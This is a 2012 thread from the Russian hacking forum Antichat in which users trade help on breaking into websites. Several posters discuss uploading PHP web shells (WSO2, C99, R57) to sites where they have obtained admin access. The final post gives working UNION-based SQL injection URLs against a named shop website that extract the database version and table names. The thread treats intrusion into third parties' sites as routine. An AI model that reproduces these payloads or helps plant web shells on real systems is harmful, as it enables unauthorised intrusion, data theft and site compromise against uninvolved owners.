HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 04.01.2012, 21:06
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

jecka3000, http://grabberz.com/showthread.php?t=30960
 
Ответить с цитированием

  #2  
Старый 04.01.2012, 21:52
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме:
4819

Репутация: 0
По умолчанию

Не могу понять в чем дело

заливаю обычный (любой) скрипт на сайт - все ок,

заливаю wso2 шелл - пустая страница
 
Ответить с цитированием

  #3  
Старый 04.01.2012, 22:06
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

Цитата:
Сообщение от sl1k  
sl1k said:
Не могу понять в чем дело
заливаю обычный (любой) скрипт на сайт - все ок,
заливаю wso2 шелл - пустая страница
Залей другой шелл. Думаю проблема в шелле

Например C99 или R57
 
Ответить с цитированием

  #4  
Старый 04.01.2012, 22:59
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

помогите залить шелл, есть доступ в админку, вроде делаю все как нада, и пишет "сохранено" но нету нигде его, или криворукий такой чтоль, ссылку брошу в личку
 
Ответить с цитированием

  #5  
Старый 04.01.2012, 23:09
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
помогите залить шелл, есть доступ в админку, вроде делаю все как нада, и пишет "сохранено" но нету нигде его, или криворукий такой чтоль, ссылку брошу в личку
Там что правиться? просто новость в WORD'e? правка шаблона есть?
 
Ответить с цитированием

  #6  
Старый 04.01.2012, 23:48
pirat0
Guest
Сообщений: n/a
Провел на форуме:
23576

Репутация: -1
По умолчанию

Цитата:
Сообщение от aydin-ka  
aydin-ka said:
Там что правиться? просто новость в WORD'e? правка шаблона есть?
извини чувак, но ничего не понял из выше написаного
 
Ответить с цитированием

  #7  
Старый 05.01.2012, 00:11
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

obnovi-soft[antigoogle].ru/software'

Что то не получается раскрутить, если и избавляюсь от sql ошибки то остается друга без намека на иньект, либо происходит редирект.
 
Ответить с цитированием

  #8  
Старый 05.01.2012, 00:13
sl1k
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме:
4819

Репутация: 0
По умолчанию

Цитата:
Сообщение от aydin-ka  
aydin-ka said:
Залей другой шелл. Думаю проблема в шелле
Например C99 или R57
Действительно дело в шелле, я вот только что заметил что даже у себя на хосте некоторые шеллы не работают, даже в формате *.txt не отображаются (forbidden)

Из за чего эт, мб АВ ?
 
Ответить с цитированием

  #9  
Старый 05.01.2012, 00:20
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

Цитата:
Сообщение от pirat0  
pirat0 said:
извини чувак, но ничего не понял из выше написаного
Ссылку дай в ПМ. Посмотрю что смогу сделать...

Цитата:
Сообщение от sl1k  
sl1k said:
Действительно дело в шелле, я вот только что заметил что даже у себя на хосте некоторые шеллы не работают, даже в формате *.txt не отображаются (forbidden)
Из за чего эт, мб АВ ?
Может, что-то в коде меня? может неправильно авторизацию поставил?... вариантов много...
 
Ответить с цитированием

  #10  
Старый 05.01.2012, 02:29
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от trololoman96  
trololoman96 said:
Тут можно спокойно обойтись и без вывода в ошибке и тем более не заморачиваться с тайм басед методом, там есть вывод в урл
Код:
Code:
www.shop-stroitel.ru/catalog/?id=14+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45--+
не, ну версию ещо да, а вот например

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.shop-stroitel.ru/catalog/?id=14+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45+from+information_schema.tables--+

[/COLOR][/COLOR
уже не выводит
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ